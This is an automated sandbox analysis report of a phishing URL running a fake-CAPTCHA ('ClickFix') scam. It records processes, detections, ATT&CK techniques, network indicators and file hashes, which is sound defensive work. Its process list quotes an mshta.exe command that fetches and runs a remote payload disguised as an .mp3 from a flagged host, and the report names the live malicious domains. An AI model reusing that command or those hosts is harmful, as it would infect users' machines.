Windows
Analysis Report
https://aistreamx.com/67db9a04702992c391d24ddb
Overview
General Information
Detection
Score: | 76 |
Range: | 0 - 100 |
Confidence: | 100% |
Signatures
Classification
- System is w10x64_ra
chrome.exe (PID: 6940 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --s tart-maxim ized "abou t:blank" MD5: E81F54E6C1129887AEA47E7D092680BF) chrome.exe (PID: 7132 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --no-pre-r ead-main-d ll --field -trial-han dle=2052,i ,163692645 7801346984 7,88845882 3830199375 2,262144 - -disable-f eatures=Op timization GuideModel Downloadin g,Optimiza tionHints, Optimizati onHintsFet ching,Opti mizationTa rgetPredic tion --var iations-se ed-version --mojo-pl atform-cha nnel-handl e=2128 /pr efetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
chrome.exe (PID: 5892 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" "htt ps://aistr eamx.com/6 7db9a04702 992c391d24 ddb" MD5: E81F54E6C1129887AEA47E7D092680BF)
mshta.exe (PID: 2072 cmdline:
"C:\Window s\system32 \mshta.exe " https:// pub-69ca46 21dc04444c 93e08fedc7 fdae4d.r2. dev/iiii.m p3 # # ? ? m ??t ? ?? b?t: ????C HA Ver?f?c ?t??? UID: 181902 MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
- cleanup
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_CAPTCHAScam | Yara detected CAPTCHA Scam/ ClickFix | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_CAPTCHAScam | Yara detected CAPTCHA Scam/ ClickFix | Joe Security | ||
JoeSecurity_CAPTCHAScam | Yara detected CAPTCHA Scam/ ClickFix | Joe Security |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-03-24T11:54:14.114394+0100 | 2859486 | 1 | A Network Trojan was detected | 149.248.213.147 | 443 | 192.168.2.16 | 49706 | TCP |
- • Phishing
- • Compliance
- • Software Vulnerabilities
- • Networking
- • System Summary
- • Persistence and Installation Behavior
- • Malware Analysis System Evasion
Click to jump to signature section
Phishing |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Source: | Joe Sandbox AI: |
Source: | OCR Text: | ||
Source: | OCR Text: |
Source: | HTTP Parser: |
Source: | HTTP Parser: | ||
Source: | HTTP Parser: |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Source: | Memory has grown: |
Networking |
---|
Source: | Suricata IDS: |
Source: | HTTP traffic: |
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: |
Source: | HTTP traffic detected: |
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Source: | File created: |
Source: | File deleted: |
Source: | Key opened: |
Source: | Classification label: |
Source: | File created: |
Source: | Key opened: |
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: |
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: |
Source: | Key value queried: |
Source: | Key opened: |
Source: | Window detected: |
Persistence and Installation Behavior |
---|
Source: | OCR Text: | ||
Source: | OCR Text: | ||
Source: | OCR Text: | ||
Source: | OCR Text: | ||
Source: | OCR Text: | ||
Source: | OCR Text: |
Source: | Clipboard modification: |
Source: | Window / User API: | ||
Source: | Window / User API: |
Source: | Thread sleep count: | ||
Source: | Thread sleep count: | ||
Source: | Thread sleep count: |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 3 Browser Extensions | 1 Process Injection | 11 Masquerading | OS Credential Dumping | 1 Virtualization/Sandbox Evasion | Remote Services | 1 Email Collection | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Virtualization/Sandbox Evasion | LSASS Memory | 1 Application Window Discovery | Remote Desktop Protocol | Data from Removable Media | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 Extra Window Memory Injection | 1 Process Injection | Security Account Manager | 2 System Information Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 DLL Side-Loading | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 File Deletion | LSA Secrets | Internet Connection Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Extra Window Memory Injection | Cached Domain Credentials | Wi-Fi Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
pub-69ca4621dc04444c93e08fedc7fdae4d.r2.dev | 162.159.140.237 | true | true | unknown | |
random-check.fly.storage.tigris.dev | 149.248.213.147 | true | true | unknown | |
cdnjs.cloudflare.com | 104.17.24.14 | true | false | high | |
lb-ash-1.arunsaini.net | 5.161.37.228 | true | false | unknown | |
www.google.com | 142.250.80.100 | true | false | high | |
aistreamx.com | unknown | unknown | false | unknown |
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
true |
| unknown | |
false | high | ||
false | high | ||
false | unknown | ||
true |
| unknown |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
142.250.80.46 | unknown | United States | 15169 | GOOGLEUS | false | |
104.17.24.14 | cdnjs.cloudflare.com | United States | 13335 | CLOUDFLARENETUS | false | |
1.1.1.1 | unknown | Australia | 13335 | CLOUDFLARENETUS | false | |
162.159.140.237 | pub-69ca4621dc04444c93e08fedc7fdae4d.r2.dev | United States | 13335 | CLOUDFLARENETUS | true | |
142.250.65.174 | unknown | United States | 15169 | GOOGLEUS | false | |
142.250.80.100 | www.google.com | United States | 15169 | GOOGLEUS | false | |
149.248.213.147 | random-check.fly.storage.tigris.dev | Canada | 174 | COGENT-174US | true | |
142.251.32.99 | unknown | United States | 15169 | GOOGLEUS | false | |
142.250.80.99 | unknown | United States | 15169 | GOOGLEUS | false | |
5.161.37.228 | lb-ash-1.arunsaini.net | Germany | 24940 | HETZNER-ASDE | false | |
142.251.40.131 | unknown | United States | 15169 | GOOGLEUS | false | |
142.251.40.174 | unknown | United States | 15169 | GOOGLEUS | false | |
142.251.40.163 | unknown | United States | 15169 | GOOGLEUS | false | |
142.251.41.3 | unknown | United States | 15169 | GOOGLEUS | false | |
172.253.115.84 | unknown | United States | 15169 | GOOGLEUS | false |
IP |
---|
192.168.2.16 |
192.168.2.4 |
Joe Sandbox version: | 42.0.0 Malachite |
Analysis ID: | 1646888 |
Start date and time: | 2025-03-24 11:53:42 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | defaultwindowsinteractivecookbook.jbs |
Sample URL: | https://aistreamx.com/67db9a04702992c391d24ddb |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 17 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | stream |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal76.phis.win@23/6@9/156 |
- Exclude process from analysis
(whitelisted): svchost.exe - Excluded IPs from analysis (wh
itelisted): 142.251.40.174, 14 2.251.41.3, 142.250.80.46, 172 .253.115.84, 142.251.40.142, 1 42.250.65.206, 142.251.32.99, 142.251.40.163 - Excluded domains from analysis
(whitelisted): clients2.googl e.com, accounts.google.com, re director.gvt1.com, clientservi ces.googleapis.com, clients.l. google.com, www.gstatic.com - Not all processes where analyz
ed, report is missing behavior information - Report size getting too big, t
oo many NtEnumerateKey calls f ound. - Report size getting too big, t
oo many NtOpenFile calls found . - Report size getting too big, t
oo many NtOpenKeyEx calls foun d. - Report size getting too big, t
oo many NtProtectVirtualMemory calls found. - Report size getting too big, t
oo many NtQueryValueKey calls found. - Some HTTPS proxied raw data pa
ckets have been limited to 10 per session. Please view the P CAPs for the complete data. - VT rate limit hit for: https:
//aistreamx.com/67db9a04702992 c391d24ddb
Process: | C:\Windows\System32\mshta.exe |
File Type: | |
Category: | modified |
Size (bytes): | 6012050 |
Entropy (8bit): | 7.977512283192218 |
Encrypted: | false |
SSDEEP: | |
MD5: | 07FA9B5D130081BC5B5BB102A1338511 |
SHA1: | C56D0043209409913D3CF82637C7F3FADB5D8C8D |
SHA-256: | 13207F618DA63AAEC4D78C58C8C5C955C0B3B6BD16B57E7F38C15FE3AE145B20 |
SHA-512: | 9339710E3D79E21669C464C154EBDF0F44CFC181B3FC49633580F0C88B9D066406394FAD0B97944521B53B68A81F32E104FA585B8416285128B6FE83B1DB1239 |
Malicious: | false |
Reputation: | unknown |
Preview: |
Process: | C:\Program Files\Google\Chrome\Application\chrome.exe |
File Type: | |
Category: | downloaded |
Size (bytes): | 262 |
Entropy (8bit): | 5.168204553522424 |
Encrypted: | false |
SSDEEP: | |
MD5: | D2CE7A2C5DF41DEEAD149E5D3FA10C00 |
SHA1: | F1C32D1E044999096B44EA4295CA6E3773230CC5 |
SHA-256: | D9F6284F8A51F14D42F126E7D5EE0217AC934588EF49C60C1796DC0FF2F22F44 |
SHA-512: | 54E5EDA61EE59A37941ECD04480B5EE71A10C83777E6FAAD29AD748C6EE2757ED451BC88BC9B52A7D5EF2A34384C6D38F5DE57E87883A3A9A0239006F52977B8 |
Malicious: | false |
Reputation: | unknown |
URL: | https://random-check.fly.storage.tigris.dev/favicon.ico |
Preview: |
Process: | C:\Program Files\Google\Chrome\Application\chrome.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 2228 |
Entropy (8bit): | 7.82817506159911 |
Encrypted: | false |
SSDEEP: | |
MD5: | EF9941290C50CD3866E2BA6B793F010D |
SHA1: | 4736508C795667DCEA21F8D864233031223B7832 |
SHA-256: | 1B9EFB22C938500971AAC2B2130A475FA23684DD69E43103894968DF83145B8A |
SHA-512: | A0C69C70117C5713CAF8B12F3B6E8BBB9CDAF72768E5DB9DB5831A3C37541B87613C6B020DD2F9B8760064A8C7337F175E7234BFE776EEE5E3588DC5662419D9 |
Malicious: | false |
Reputation: | unknown |
Preview: |
Process: | C:\Program Files\Google\Chrome\Application\chrome.exe |
File Type: | |
Category: | downloaded |
Size (bytes): | 105204 |
Entropy (8bit): | 7.989899350029445 |
Encrypted: | false |
SSDEEP: | |
MD5: | EE91E640B5449FB98D9320C877A9866E |
SHA1: | 7FDC6B3926B1DD023F9F2AD7D53BC22694694281 |
SHA-256: | 33A252D6393CBD6DEBE0AC517229C7AA258A0EE68FC0253F8BE6A7CEE8B65EE9 |
SHA-512: | B787D1E727C77E85DE52FDEDEA16A719BE00CFABF739F44451A2A35DB443900E8B3178DB1DDD5EAE9018850888B94994343E9B1E15873CD0211DAE83C405BD3D |
Malicious: | false |
Reputation: | unknown |
URL: | https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/webfonts/fa-brands-400.woff2 |
Preview: |
Process: | C:\Program Files\Google\Chrome\Application\chrome.exe |
File Type: | |
Category: | downloaded |
Size (bytes): | 83981 |
Entropy (8bit): | 4.7735566283508355 |
Encrypted: | false |
SSDEEP: | |
MD5: | 3D5EF2BF867C4054A2F336CDBAD9E1DC |
SHA1: | 07228D1FA3245EE156A27A353F45758A3207849F |
SHA-256: | A361E7885C36BACB3FD9CB068DA207C3B9329962CAC022D06E28923939F575E8 |
SHA-512: | 168DEB96B663FE4EEE8D39C78380864760FB912B34BF82CB6A7C36AA4B18B91944CCEFAD71A10F428810D0A6A818DDBAFF3AE7DB42264750DFB8B5A73A8EDA04 |
Malicious: | false |
Reputation: | unknown |
URL: | https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css |
Preview: |
Process: | C:\Program Files\Google\Chrome\Application\chrome.exe |
File Type: | |
Category: | downloaded |
Size (bytes): | 5307 |
Entropy (8bit): | 5.697362617511034 |
Encrypted: | false |
SSDEEP: | |
MD5: | D8A5C7C2BE846B83DCF2D6C6E84783D1 |
SHA1: | DBD0C7BE03C044481AC1B3E1A37E474189E0D419 |
SHA-256: | 65FFB34BD1682D6C9A08838C72519F9F2F6C008C4257074632530AC4DB08358B |
SHA-512: | 6719AF1975A5D069431E89E06058E0230DA80841E33A9DA4AF1B24C5C2813E3FBEAF82C02D3EB58FF3F5C9CADED0A9D7FC1161E575DA0E6877D2A7698C11AA1C |
Malicious: | false |
Reputation: | unknown |
URL: | https://random-check.fly.storage.tigris.dev/pass-this-security-check.html?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=tid_RybmvaL_VPmJmFgiNKurjXyuWNvFGfefZntnOVLTLtBupRlkVi%2F20250323%2Fauto%2Fs3%2Faws4_request&X-Amz-Date=20250323T095737Z&X-Amz-Expires=518400&X-Amz-SignedHeaders=host&X-Amz-Signature=a06915b9229b481cc5fe9e3c9d63289209b196ef3db05e2da16ce691e820affd |
Preview: |